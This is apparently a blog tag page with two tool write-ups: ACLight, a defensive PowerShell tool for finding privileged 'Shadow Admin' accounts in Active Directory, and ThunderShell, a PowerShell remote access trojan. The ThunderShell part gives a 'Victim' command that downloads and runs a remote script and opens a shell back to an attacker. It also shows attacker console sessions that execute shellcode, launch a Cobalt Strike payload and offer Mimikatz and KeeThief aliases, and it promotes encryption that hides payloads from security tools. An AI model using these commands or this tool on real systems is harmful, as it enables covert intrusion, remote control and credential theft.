Termux ID: PowerView -->

    Social Items

Home / PowerView

ACLight is a tool for discovering privileged accounts through advanced ACLs (Access Lists) analysis. It includes the discovery of Shadow Admins in the scanned network.
The tool queries the Active Directory (AD) for its objects' ACLs and then filters and analyzes the sensitive permissions of each one. The result is a list of domain privileged accounts in the network (from the advanced ACLs perspective of the AD). You can run the scan with just any regular user (could be non-privileged user) and it automatically scans all the domains of the scanned network forest.
Just run it and check the result.
You should take care of all the privileged accounts that the tool discovers for you. Especially - take care of the Shadow Admins - those are accounts with direct sensitive ACLs assignments (not through membership in other known privileged groups).

Usage:
Option 1:
  • Double click on "Execute-ACLight.bat".
Option 2:
  • Open PowerShell (with -ExecutionPolicy Bypass)
  • Go to "ACLight" main folder
  • “Import-Module '.\ACLight.psm1'”
  • “Start-ACLsAnalysis”

Reading the results files:
  1. First check the - "Accounts with extra permissions.txt" file - It's straight-forward & important list of the privileged accounts that were discovered in the scanned network.
  2. "All entities with extra permissions.txt" - The file lists all the privileged entities that were discovered, it will include not only the user accounts but also other “empty” entities like empty groups or old accounts.
  3. "Privileged Accounts Permissions - Final Report.csv" - This is the final summary report - in this file you will find what are the exact sensitive permissions each account has.
  4. "Privileged Accounts Permissions - Irregular Accounts.csv" - Similar to the final report with only the privileged accounts that have direct assignment of ACL permissions (not through their group membership).
  5. "[Domain name] - Full Output.csv" - Raw ACLs output for each scanned domain.

Scalability - scanning very large networks or networks with multiple trusted domains:
The tool by default will scan automatically all the domains in the target scanned AD forest.
If you want to scan a specific domain and not the others - you can just close those domains’ pop-up windows when they show up and continue regularly.
If you are scanning very large network (e.g. 50,000+ users in one domain) and encounter memory limitations during the scan - there are some tips you can check in the “issue” page.

References:
The tool uses functions from the open source project PowerView by Will Schroeder (@harmj0y) - a great project.
For more comments and questions, you can contact Asaf Hecht (@Hechtov) and CyberArk Labs.


ACLight - PowerShell Script for Advanced Discovery of Privileged Accounts (includes Shadow Admins)


ThunderShell is a Powershell based RAT that rely on HTTP request to communicate. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network hooks.

Dependencies
apt install redis-server
apt install python-redis

Logs
Every errors, http requests and commands are logged in the logs folder.

How it works
Once the PowerShell script is executed and HTTP request will be issued to the server. The body of each POST request contains the RC4 encrypted communication. Why RC4 because it's strong enough to hide the traffic. The idea is to upload / download data over the network that cannot be inspected. The RAT support HTTPS but some security product may perform SSL interception and obtain visibility on your data leading to detection of malicious payload (PowerShell script, stager etc...). The RC4 encryption allows you to communicate over the wire without leaking your payload. The RC4 encryption also protects against endpoint agent that inspects traffic directly on the host, again the traffic is decrypted at the "software" level blocking detection at that level too.
To use the power of the tool there is some built-in function such as fetch, exec and upload that allow you to run your payload quite easily.
  • Fetch flow
The server will fetch a resource (path, url) 
        Send the data over the RC4 encrypted channel
                The PowerShell RAT will decrypt the payload 
                        PowerShell Execute the final payload
For example if you fetch PowerView.ps1 script it will be fully encrypted over the wire avoiding detection since the server is proxying the request and fully encrypt the data.

Usage
Victim:
powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://ringzer0team.com/PS-RemoteShell.ps1'); PS-RemoteShell -ip 1.1.1.1 -port 8080 -Key test -Delay 2000
Attacker side example:
  • default.json:
{
        "redis-host": "localhost",
        "redis-port": 6379,

        "http-host": "192.168.17.129",
        "http-port": 8080,
        "http-server": "Microsoft-IIS/7.5",

        "https-enabled": "off",
        "https-cert-path": "cert.pem",

        "encryption-key": "test",
        "max-output-timeout": 5
}
me@debian-dev:~$ python ThunderShell.py default.json

Thunder Shell 1.1 | Clients Server CLI
Mr.Un1k0d3r RingZer0 Team 2017
--------------------------------------------------------

[+] Starting web server on 192.168.17.129 port 8080

(Main)>>>
[+] Registering new shell 10.0.0.153:RingZer0\MrUn1k0d3r
[+] New shell ID 13 GUID is 4c05a17f-036a-4cd4-9446-da46281d5754


[-]  is not a valid command

(Main)>>> help

Help Menu
-----------------------

        list      args (full)             List all active shells
        interact  args (id)               Interact with a session
        show      args (error/http/event, count)  Show error, http or event log (default number of rows 10)
        kill      args (id)               Kill shell (clear db only)
        exit                              Exit the application
        help                              Show this help menu

(Main)>>> list

List of active shells
-----------------------

  4       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r
  3       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r
  2       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r
  1       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r

(Main)>>> list full

List of active shells
-----------------------

  4       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r 2836ccdc-6747-45a4-8461-fa4022ac6bd0 last seen 13/09/2017 09:59:32
  3       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r d09093a0-d3d7-4de9-b3a9-191ab7b2fef1 last seen 13/09/2017 09:54:31
  2       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r 8d95e7c8-6868-4eb3-8ba8-231a1fdfcb92 last seen 13/09/2017 09:50:18
  1       x64  -  10.0.0.153:RingZer0\MrUn1k0d3r 90c608da-b64d-4d3a-9336-458e73658e49 last seen 12/09/2017 18:27:47

(Main)>>> interact 4

(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> help

Shell Help Menu
-----------------------

        background                              Return to the main console
        refresh                                 Check for previous commands output
        fetch         args (path/url, command)  In memory execution of a script and execute a commmand
        exec          args (path/url)           In memory execution of code (shellcode)
        read          args (remote path)        Read a file on the remote host
        upload        args (path/url, path)     Upload a file on the remote system
        ps                                      List processes
        powerless     args (powershell)         Execute Powershell command without invoking Powershell
        inject        args (32/64, pid, command)Inject command into a target process (max length 4096)
        alias         args (key, value)         Create an alias to avoid typing the same thing over and over
        delay         args (milliseconds)       Update the callback delay
        help                                    Show this help menu


List of built in alias
-----------------------

        powerup                 PowerUp tool set
        wmiexec                 Remote-WmiExecute utility
        searchevent             Search-EventForUser utility
        keethief                KeeThief tool set (Get-KeePassDatabaseKey)
        mimikatz                Invoke-Mimikatz utility
        inveigh                 Invoke-Inveigh utility
        powerview               PowerView tool set


List user defined alias
-----------------------


(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> whoami
RingZer0\MrUn1k0d3r

(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> delay 0
Updating delay to 0
Delay is now 0


(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> fetch powerview Get-NetLocalGroup -ComputerName 127.0.0.1
[+] Fetching https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
[+] Executing Get-NetLocalGroup -ComputerName 127.0.0.1


(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> refresh


ComputerName : 127.0.0.1
AccountName  : 10-R90G3RLC-1GG/Administrator
IsDomain     : False
IsGroup      : False
SID          : S-1-5-21-
Description  : Built-in account for administering the computer/domain
PwdLastSet   : 8/11/2017 6:01:45 PM
PwdExpired   : False
UserFlags    : 66049
Disabled     : False
LastLogin    : 8/11/2017 5:58:47 PM

(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> fetch https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-BrowserHomepage.ps1 Get-BrowserHomepage
[+] Fetching https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamPowershellScripts/master/scripts/Get-BrowserHomepage.ps1
[+] Executing Get-BrowserHomepage

Start Page
----------
https://www.ringzer0team.com/


(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> ps

 PID Name                       Owner                    CommandLine
 --- ----                       -----                    -----------
   0 System Idle Process
   4 System
 364 smss.exe
 492 csrss.exe

(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> exec /home/attacker/cobaltstrike-reverse-https
[+] Fetching /home/attacker/cobaltstrike-reverse-https
[+] Payload should be executed shortly on the target

(x64 - 10.0.0.153:RingZer0\MrUn1k0d3r)>>> background

(Main)>>> show http

Last 10 lines of log
-----------------------

192.168.17.1 (Wed Sep 13 17:09:42 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1

192.168.17.1 (Wed Sep 13 17:09:40 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1

192.168.17.1 (Wed Sep 13 17:09:38 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1

192.168.17.1 (Wed Sep 13 17:09:35 2017) [192.168.17.1] POST /?ba1192b6-5dc4-4b75-be3a-e0e9fa819088 HTTP/1.1
Credit
Mr.Un1k0d3r RingZer0 Team 2017


ThunderShell - PowerShell based RAT

Subscribe to: Posts (Atom)